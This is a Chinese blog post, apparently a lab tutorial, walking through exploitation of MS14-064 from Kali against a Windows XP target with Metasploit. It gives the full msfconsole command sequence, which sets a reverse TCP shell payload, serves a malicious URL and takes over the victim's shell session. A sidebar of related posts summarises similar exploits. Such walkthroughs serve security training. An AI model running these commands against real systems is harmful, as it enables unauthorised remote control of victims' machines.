针对ms14-064模块漏洞的网络渗透实战

已于 2023-01-11 14:25:13 修改
阅读量912 收藏 5
点赞数
分类专栏: 网络安全 文章标签: 网络安全 Powered by 金山文档
于 2023-01-11 14:19:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunkaijie123/article/details/128643584
版权

一、环境说明

渗透机:kali

靶机:Windows xp

二、实战步骤

1、进入msfconsole渗透测试平台

命令:msfconsole

2、搜索ms14-064模块

命令:search ms14-064

3、使用exploit/windows/browser/ms14_064_ole_code_execution

命令:use exploit/windows/browser/ms14_064_ole_code_execution

4、查看需要配置的参数

命令:show options

5、配置参数

命令:

set SRVHOST 192.168.X.XX (设置本地监听地址)

set SRVPORT 8080 (设置本地监听端口)

set URIPATH / (设置网站路径)

set PAYLOAD windows/shell/reverse_tcp (设置攻击模块)

set LHOST 192.168.X.XX (设置攻击机地址)

6、再次查看配置好之后的参数

命令:show options

7、输入攻击命令,进行漏洞模块攻击

命令:run(或者exploit)

8、拿到步骤7中生成的url,在靶机中打开

9、在渗透机查看活跃会话

命令:sessions -i

10、进行渗透

命令:sessions -i 1

11、渗透成功,输入ipconfig查看效果

古道青阳
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
ms14-068.exe域内神器
11-25
【标题】"ms14-068.exe域内神器" 涉及的主要知识点是Microsoft在2014年发布的安全更新公告MS14-068,它与Windows操作系统中的Kerberos认证漏洞有关。这个漏洞允许攻击者通过精心构造的请求,绕过域控制器的安全验证...
MS10-070ASP.NETPaddingOracle信息泄露漏洞
03-02
我记得这个漏洞在12年的时候,国内的资料还很少,当时遇到之后来回找资料,但是国内当时在网上能看到的资料只有2篇,但我忘记是哪2篇了,不过手上是有2篇比较早的资料,先传上来做个引题吧。然后,在13年,这个漏洞...
MS14-064(OLE远程代码执行漏洞复现)
Martin-share的博客
02-11 2243
MS14-064(OLE远程代码执行漏洞复现)
E030-操作系统漏洞验证及加固-MS14_064漏洞利用与安全加固
轻舟已过万重山
10-13 400
本章节我将复现MS14-064漏洞的利用过程,就不演示发现,扫描,主机漏洞的过程,直接进入验证阶段。
MS14-064/CVE-2014-6332漏洞复现(OLE远程代码执行漏洞、IE浏览器漏洞
最新发布
m0_74168970的博客
04-24 379
MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution,主要利用IE浏览器漏洞,Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用Internet Explorer浏览器查看该网站的时允许远程执行代码。show options:查看需要设置的地方。
MS14_064 漏洞利用与安全加固
theRavensea
03-18 1257
要利用此漏洞则需要进行用户交互。通过发送电子邮件信息给本地登录用户的攻击要想得逞,需要该用户打开包含经特殊设计的 OLE 对象的附件。许多不同类型的附带文档都可能包含受影响的 OLE 对象,所有 Office 文件类型以及其他一些第三方文件类型都可能包含恶意 OLE 对象。在电子邮件攻击情形中,攻击者可以通过向用户发送经特殊设计的文件并诱使用户打开该文件来利用此漏洞。在基于 Web 的攻击情形中,攻击者必须拥有一个网站,其中包含用来试图利用此漏洞的 Office 文件。另外,受到破坏的网站以及接受或宿主用户
渗透攻击之ms14-064漏洞利用实验
wylululu的博客
01-07 8063
ms14-064简介 Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 –Win10+IE11全版本。 实验步骤: 第一步:打开已安装好的kaili虚拟机系统,显示界面: 第二步:单击打开metasploit framework或者点击左上角应用程序&...
网络安全渗透实战详细详解
m0_61869253的博客
06-14 170
本次内容详解ms14-064漏洞利用与加固。**任务环境说明:渗透机:Kali Linux靶机:Microsoft Windows XP渗透机IP:172.16.7.122靶机IP:172.16.7.120.打开网络拓扑 进入msfconsole渗透测试平台.输入命令 search ms14-064 搜索模块,并用use 调节 输入此下面红色模块.输入 show options查看配置所需的参数。
pykek-ms14-068.zip
01-06
标题“pykek-ms14-068.zip”和描述中的信息看似简洁,但它们实际上指向了一个特定的网络安全事件和相关的补丁。"pykek"可能是这个事件或漏洞的代号,而"ms14-068"是微软在2014年发布的一个安全公告编号。微软通常...
三菱FX5-CCL-MS模块硬件手册.rar
06-22
《三菱FX5-CCL-MS模块硬件手册》是针对三菱自动化产品中的一款核心组件——FX5-CCL-MS模块的详细技术指南。该手册涵盖了该模块的各个方面,旨在帮助工程师和技术人员更好地理解和应用这一高性能的工业控制器。以下是...
MS14-064漏洞复现
kukudeshuo的博客
02-28 6880
MS14-064漏洞复现 摘要 此安全更新可解决 Microsoft Windows 对象链接与嵌入 (OLE) 中 2 个私下报告的漏洞。最严重的漏洞可能在用户使用 Internet Explorer 查看经特殊设计的网页时允许远程执行代码。成功利用这些漏洞的攻击者可以在当前用户的上下文中运行任意代码。如果当前用户使用管理用户权限登录,则攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少用户权限的用户比具有管理用户权限的用户受到的影响要小。 漏洞影响版本
MS14-064(OLE远程代码执行)漏洞复现
m0_73263892的博客
06-23 386
MicrosoftWindowsOLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3——Win10+IE11全版本。
ms14_064漏洞复现
Y1da的博客
09-03 1562
一、环境准备 利用VMware安装win7虚拟机x1,kali Linux虚拟机x1. 二、实验步骤 1.命令行输入以下命令启动metasploit msfconsole 2.输入以下命令搜索ms14漏洞,并在其中找到metasploit的漏洞利用模块exploit/windows/browser/ms14_064_ole_code_execution search ms14 3.输入以下命令加载漏洞利用模块 use exploit/windows/browse...
XSS漏洞利用方式汇总
热门推荐
Kevin's Blog
05-04 1万+
文章目录一、窃取Cookie1.1 解释1.2 操作搭建xss平台二、 以下所有的针对XSS的利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作!!! 一、窃取Cookie 1.1 解释   恶意攻击者通过XSS攻击,窃取其他账户的Cookie信息从而进行未授权非法操作。 1.2 操作 搭建xss平台 这里我直接百度使用一个xss平台来接Cookie Tips:为了安全...
MS14-064 漏洞复现
p_utao的博客
03-05 777
背景 Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本… 模块:exploit/windows/browser/ms14_064_ole_code_execution 复现 系统 IP linux 10.7.10.43 win7 10.7.10.49 msf6 > search ms14-064
metasploit后渗透入门--meterpreter
Yale的博客
01-14 3221
0x01利用漏洞拿到Meterpreter。 将存放在桌面上的exploit文件复制到metasploit系统指定的exploits存储路径中,并将exploit的属性设置为644. cp ~/Desktop/ms14_064_ole_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/browser/ chmod...
系统渗透ms14-064漏洞攻击
旺仔Sec&blog
12-15 1800
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术, 远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本... metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution 漏洞利用成功 ...
MS14-064 漏洞测试入侵win7
aozhuo4755的博客
04-25 1871
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术, 远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本... metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_executi...
ms14-064漏洞复现停滞在Sending exploit
06-12
我理解你的问题是想要复现 MS14-064 漏洞,但是在发送 exploit 时遇到了问题,出现了停滞的情况。 首先,MS14-064 是一个由 Microsoft 发布的安全公告,涉及的漏洞编号为 CVE-2014-6324,它存在于 Windows Object Linking and Embedding (OLE) 中,攻击者可以利用该漏洞实现远程执行代码。 如果你想要复现该漏洞,可以先找到一个受影响的 Windows 系统,并下载相应的漏洞利用工具。在发送 exploit 之前,你需要确保目标主机与攻击者主机之间能够正常通信,并且攻击者主机已经安装了相应的依赖库和工具。 如果出现了停滞的情况,可能是由于网络连接出现了问题,或是漏洞利用工具配置不正确等原因。你可以根据漏洞利用工具的日志信息来进行排查,或是参考相关的攻击教程进行调试。 需要注意的是,漏洞利用是一项高度危险的操作,建议在合法授权的情况下进行,并且不要在生产环境中进行测试。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

古道青阳

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值